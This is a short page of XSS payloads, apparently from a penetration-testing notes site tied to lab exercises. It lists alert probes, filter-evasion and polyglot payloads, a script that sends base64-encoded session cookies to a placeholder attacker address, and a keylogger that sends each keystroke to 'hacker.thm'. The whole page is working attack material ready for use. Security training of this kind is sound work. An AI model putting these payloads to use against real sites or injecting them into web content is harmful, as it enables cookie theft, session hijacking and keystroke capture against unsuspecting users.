4. XSS Payloads

</script><script>alert(document.cookie);</script>
</script><A HREF="http://bing.com/"><h1>XSS</h1></A>
<sscriptcript>alert('THM');</sscriptcript>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
</textarea><script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script> #cookie stealing xss
<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script> # keylogger
'-alert(1)-'
<img/src/oner%ror="alert(1)"> 
"><img/src/oner%ror="alert(1)">

Previous3. SQLMAP Commands Next6. Wireless Networks VAPT

Last updated 1 year ago